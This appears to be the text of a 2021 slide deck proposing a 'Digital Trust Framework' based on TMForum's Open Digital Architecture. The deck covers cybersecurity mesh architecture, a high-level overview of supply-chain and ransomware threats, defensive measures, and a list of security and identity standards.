The document discusses the Digital Trust Framework (DTF), which will use the TMForum's Open Digital Architecture (ODA) as a foundation. The DTF is being developed for 4IR environments and will provide a blueprint for modular, cloud-based, open digital platforms that can be orchestrated using AI. It will integrate ODA with other frameworks to ensure an overall digital trust approach for continuously evolving systems.

1. DIGITAL TRUST
FRAMEWORK (DTF)
Maganathin Veeraragaloo
7th December 2021

2. The TMForum's Open Digital Architecture (ODA)will be used as
the cornerstone for this Framework
https://www.tmforum.org/oda/
ODA was initially designed for the Telecommunications Industry
inclusive of 5G Services.
The Digital Trust Framework is developed for the 4IR Environment
The Digital Trust Framework (DTF) will be a blueprint for modular,
cloud-based, open digital platforms that can be orchestrated using AI
ODA will be integrated with COBIT 2019, ITIL 4 and ISO 27005 RISK
MANAGER – this is to ensure an overall Digital Trust approach for a
continuous evolving SYSTEMS Environment

3. Transformation Tools
As-Is
Applications
Transformation
Toolkits
Maturity Tools
Metrics
Maturity
Models
Data
Benchmark
Data
AI Training
Data
DIGITAL TRUST
FRAMEWORK
DIGITAL
TRUST
ARCHITECTURE
Governance
Concepts & Principles
Design Guides
Microservices
Architecture
Governance
AI Governance
Data Governance
Security Governance
Agile
Lifecycle
Management
Business
Deployment & Run
Information Systems
Implementation
Business Capability
Repository
Process Framework
Information
Framework
Integration
Framework
Functional
Framework &
Architecture
Canvas
Operation
Frameworks
Reference
Implementation
Technical
Architecture
Components
Open API’s
Data Model

4. ITIL 4
Capability Framework
DIGITAL TRUST
FRAMEWORK
Governance &
Processes
Cybersecurity Mesh
Architecture

5. CYBERSECURI
TY MESH
ARCHITECTUR
E

8. SOURCE: GARTNER

9. 1. Authenticated partner compromise (Target, Stuxnet)
2. Outsourced IT based attacks (Kaseya, CloudStar)
3. Source code modification ( SolarWinds, NotPetya, CC cleaner)
4. Modified applications in production (Web CC scraping)
5. Stolen Certificates (Codecov, Bit9, Mimecast)
6. Stolen source code (RSA)
7. Open-source code components (RubyGems)
8. App store and browser plug in trojans (Exodus, Great
Suspender)
SOURCE: GARTNER – FIRSTBROOK

10. 1. Testing Software Integrity
 To address software integrity vulnerabilities:
• Maintain software inventory and incorporate software bill of materials (SBOM)
• Deploy file integrity monitoring and threat hunt regularly
• Perform purple team exercises to sharpen security posture
2. Excessive Access By Tokens
 The truth is that solutions like single sign-on (SSO) and multi-factor authentication (MFA) can spell disaster
if initial access is all a malicious actor needs to traverse the network’s resources. For token administrators,
the job becomes configuring access to mitigate excessive access. Without the user even realizing it, attackers
can hijack access tokens.
3. Using Vulnerable Crypto For Application Access
 In the same vein as software integrity vulnerabilities, developers find themselves stuck between meeting
impatient consumer demand and optimizing security.
 The result is organizations and token generators using cryptography with known vulnerabilities. Though
users may have access to the application faster, the organization is more vulnerable as a consequence.
 Organizations must validate their application access systems to ensure malicious actors aren’t capable of
cracking the crypto.
SOURCE: https://www.esecurityplanet.com/trends/vulnerabilities-rsac-2021/

11. 4. Ransomware: Encryption, Exfiltration, And Extortion
Ransomware perpetrators of the past presented a problem of availability
through encryption.
The new normal among ransomware families is the addition
of exfiltration and extortion.
 SANS Senior touched on the process hackers take, including
i. initial access,
ii. reconnaissance,
iii. lateral movement,
iv. exfiltration, and
v. encryption.
Using legitimate file-sharing tools like RClone and MegaCmdServer to
mask activity, malicious actors can go undetected while downloading the
network’s data.
SOURCE: https://www.esecurityplanet.com/trends/vulnerabilities-rsac-2021/

12. 5. Excessive Access By Tokens
The truth is that solutions like single sign-on (SSO)
and multi-factor authentication (MFA) can spell disaster
if initial access is all a malicious actor needs to traverse
the network’s resources. For token administrators, the
job becomes configuring access to mitigate excessive
access. Without the user even realizing it, attackers can
hijack access tokens.
While the rate of returned data when organizations pay
the ransom has been high in the past, there’s no honour
among thieves.
Conti, Netwalker, and Sodinokibi are all recent
ransomware strains that re-extorted victims or
published network contents after the ransom had been
paid.
SOURCE: https://www.esecurityplanet.com/trends/vulnerabilities-rsac-2021/

14. Redefines cybersecurity perimeters around
the identity of a person or thing
Prevents hackers from exploiting different
parts of a given network
Distributed architectural approach =
scalable, flexible & reliable cybersecurity
control
More standardized, responsive security
approach

16. Instead of SIEM and SOAR integrating security tools, the security
mesh will use security analytics and intelligence. The mesh will also
include identity, policy, posture and dashboard layers.
Cybersecurity mesh architecture, or CSMA, “is more than XDR,”
XDR, or extended detection and response, has emerged as a new
way for security vendors to tie their products together in a unified
platform. XDR is a “potential foundation” for the security analytics
and intelligence that CSMA requires, as are SIEM and SOAR,
which “can add value” to the security analytics/intelligence layer in
a security mesh
Secure Access Service Edge (SASE) technology is a meshy approach
of delivering distinct functions in an integrated manner, but the
security mesh has “a broader scope.”

17. STANDARDS ALIGNMENT
1. Threat Detection
 STIX /TAXII
 SIGMA
2. IAM
 SAML
 ODIDC
 OAUTH
 SCIM
 XACML
 OPA
 JWT
3. NETWORK FORMAT
 IPFix
4. NASCENT
 IDQL
 CAEP
4. OTHER
 OpenDXL
 NIST SCAPv2
5. STANDARD FORMATS
 Snort
 ZEEK
 Yara (Language)
6. FRAMEWORKS
 OWASP Top 10
 MITRE [ATT&CK, D3FEND]
 CVSS
 Cyber Kill Chain
 CVE

18. WHAT IS A DECENTRALIZED IDENTITY?
SOURCE: Decentralized identity architecture (Source: Gartner)

19. Traditional Identity and Access Management (IAM) has
“issues with security, scalability, reliability and privacy.
IAM has itself become a target in credential theft and
other attack techniques.
However, decentralized identity is as yet an “unproven
technology,” held back by Blockchain understanding and
skills and the difficulty of assessing risks across
Blockchain services.
WHAT IS A DECENTRALIZED IDENTITY?